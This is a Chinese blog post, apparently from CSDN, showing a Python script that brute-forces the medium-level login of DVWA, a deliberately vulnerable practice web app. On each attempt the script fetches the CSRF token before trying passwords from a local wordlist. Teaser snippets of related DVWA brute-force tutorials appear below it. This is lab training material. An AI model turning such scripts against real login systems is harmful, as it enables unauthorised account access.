dvwa - brute force - middle -python-python3模拟使用本地密码库进行暴力破解dvwa中级难度的密码

最新推荐文章于 2024-09-13 00:14:13 发布
最新推荐文章于 2024-09-13 00:14:13 发布
阅读量315 收藏
点赞数
分类专栏: dvwa 安全渗透 文章标签: dvwa brute force
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq284489030/article/details/84981373
版权

时隔一年后看这个标题,自己也有点懵逼。

加点说明吧。

dvwa是渗透测试靶机系统,好像有10钟类型漏洞;

现在用python模拟使用本地密码库进行暴力破解中级难度的密码:

密码文件psw.txt跟python文件同级目录下,内容:

111
222
password
444
5555555555555555

test.py内容如下:

import requests
import re,time

head = {
            'Host': '192.168.1.70',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
            'Accept': r'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Referer': r'http://192.168.1.70/dvwa/vulnerabilities/brute/index.php?username=admin&password=111&Login=Login&user_token=bbf84925fed8ba075c4e8b39f370e9bc',
            'Accept-Language': r'zh-CN,zh;q=0.9',
            'Cookie': 'security=high; PHPSESSID=61b69n6238mpdhu05puisaok00', #登录后复制PHPSESSID
            'Connection': 'close'
        }

file = open('psw.txt','r')
url = r'http://192.168.1.70/dvwa/vulnerabilities/brute/'
dvwa_session = requests.Session()
print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()))
for line in file:
    resp = dvwa_session.get(url=url, headers=head)
    token = re.search(r'[a-z0-9]{32}',resp.text).group()
    password = line.rstrip()

    url2 = r'http://192.168.1.70/dvwa/vulnerabilities/brute/index.php?username=admin&password=' + password + '&Login=Login&user_token=' +str(token)
    res = dvwa_session.get(url=url2,headers=head)

    print(password.strip(),len(res.text))
file.close()

 

生命的脚步从不停歇
关注
专栏目录
dvwa学习-brute force暴力破解
qq_17762247的博客
05-09 1844
一、简介: Brute-Force(暴力破解),又称为穷举攻击,是一种密码分析的方法,即将密码进行逐个推算直到找出真正的密码为止。例如:一个已知是四位数并且全部由阿拉伯数字组成的密码,其可能共有10000种组合,因此最多尝试9999次就能找到正确的密码。理论上除了具有完善保密性的密码以外,利用这种方法可以破解任何一种密码,问题只在于如何缩短试误时间。有些人运用计算机来增加效率,有些人透过字典攻击来...
DVWA-Brute Force爆破
原味瓜子、的博客
09-16 185
目录一、Low等级二、Medium等级三、High等级 一、Low等级 1、漏洞分析 if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELE
DVWA_bruteForce工具_官网下载_Bruter_1.1.zip
09-18
DVWABruteForce板块所需要用到的暴力破解工具。 日常暴力破解小能手。谁用谁知道。
DVWA-Brute Force
qq_45751902的博客
04-21 3103
配置环境 将下载的DVWA放在www目录下,然后复制一份/config/config.inc.php.dist到当前目录,并且去掉.dist。 在phpMyadmin如果没有表dvwa,则新建一个表dvwa db_user,db_password是数据的账号和密码 之后找到DVWA的路径,找到下面的create/reset database点击(再次进入phpMyadmin查看表dvwa,表中已经有数据,密码用md5加密),等2秒自动跳转登录页面 输入账号admin,密码password 如果有乱
dvwaBrute Force
Alsn86的博客
01-13 328
low等级 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND passw
DVWABrute Force
weixin_51167520的博客
03-06 643
DVWABrute Force 实验环境:Win7 win2k8 Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令 ** Low 级 ** 首先在WIN7上把安全级别改成LOW 打开WIN7访问http:192.168.60.22:81暴力破解: 漏洞利用 方法一、爆破利用 burpsuite 即可完成 输入错误的用户名和密码: 抓取流量后,发送到 Intruder 模块来进行爆破,在 Position 中的 Attack type 选择 cl
DVWA系列之8 medium级别命令执行漏洞
weixin_34405332的博客
12-09 248
DVWA Security设置为medium,在Command Execution中点击“View Source”查看网页源码。这里将用于接收用户输入IP的变量$target做了过滤,过滤的方法是定义了一个黑名单。$substitutions = array('&amp;&amp;' =&gt; '' , ';' =&gt; '', );这行语句的意思是定义了一个数组并赋值给变量$substit...
DVWA-Brute Force @ Burpsuite.docx
06-27
DVWA-Brute Force @ Burpsuite.docx
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
dvwa爆破脚本pytho3版
09-04
核心在于获取token,python3中通过requests、re模块获取token,在结合生成的字典进行爆破,代码简单展示了获取token的主要过程
DVWA】——Brute Force暴力破解
最新发布
HinsCoder的博客
09-13 1030
准备好Brup Suite软件。
算法题第10题-----唯一摩尔斯密码词,难度(中等)
zhangxiaoxiao9527的博客
11-20 264
题目 国际摩尔斯密码定义一种标准编码方式,将每个字母对应于一个由一系列点和短线组成的字符串, 比如: “a” 对应 “.-”, “b” 对应 “-…”, “c” 对应 “-.-.”, 等等。 为了方便,所有26个英文字母对应摩尔斯密码表如下: [".-","-...","-.-.","-..",".","..-.","--.","....","..",".---","-.-",".-..","--...
DVWA靶场-Brute Force暴力破解~保姆级教程!!!
2301_77360738的博客
05-09 3156
DVWA靶场初体验,超简单的暴力破解!!!
DVWA-暴力破解
qq_60848021的博客
06-26 717
说明账号是admin 密码是password2,暴力破解扩展:hydra(九头蛇)支持的协议:命令参数:刚开始用Win10 尝试使用SMB协议攻破登录密码,一直出现后来使用namp扫了下发现445端口并没有打开,后来使用Win2008做实验,小插曲:user.txt和pass.txt放在桌面上不能直接使用,需要写路径,直接放到主文件夹里面直接指定就行了,不需要写路径。重点:要先用namp扫一下对应的端口有没有打开!!!...
DVWA——暴力破解
m0_74426634的博客
04-04 2123
概述:穷举法是一种针对于密码的破译方法。这种方法很像数学上的“完全归纳法”并在密码破译方面得到了广泛的应用。简单来说就是将密码进行逐个推算直到找出真正的密码为止。比如一个四位并且全部由数字组成其密码共有10000种组合,也就是说最多我们会尝试9999次才能找到真正的密码。利用这种方法我们可以运用计算机来进行逐个推算,也就是说用我们破解任何一个密码也都只是一个时间问题。
暴力破解dvwa
leo788的博客
12-08 205
首先进行抓包,将包发送到intruder,然后对用户及密码进行暴力破解,成功。 在low的基础上添加了一定的时延,不适合大量字典,但是爆破方式与low相同。 点击进表单页面抓包包1,放掉之后再输入用户名密码抓一个,得到带有token的包,包2。包1response位置的token与包2中的token值相同。 1.定义宏:选择包1中的参数及值 2.定义执行宏的规则:更新值及发生的页面 3.cluster bomb用户名及密码,单线程爆破token。 但是与之前pikachu不同: 这里我所用的方法是在pi
DVWA-多个工具及python代码实现暴力破解登录
nex1less的博客
07-19 2274
前言现在那个DVWA里的Brute Force都已经烂大街了,那么今天我们就来演示一下如何从登录页面暴力破解进去 0x01.python代码: 1.在浏览器找到dvwa登录页面 2.我们尝试提交数据: 发现点击登录之后url上依然是login.php,并且出现login failed 提示 由此我们确定此页面的http请求方式为post 3.打开Burpsuite并...
dvwa通关brute force
06-08
这通常涉及到编写脚本或使用工具自动化尝试登录过程,比如使用Python的requests或者专门的密码暴力破解软件如John the Ripper。 步骤大致如下: 1. **了解限制**:查看是否有限制条件,如尝试次数、时间间隔等,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

生命的脚步从不停歇

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值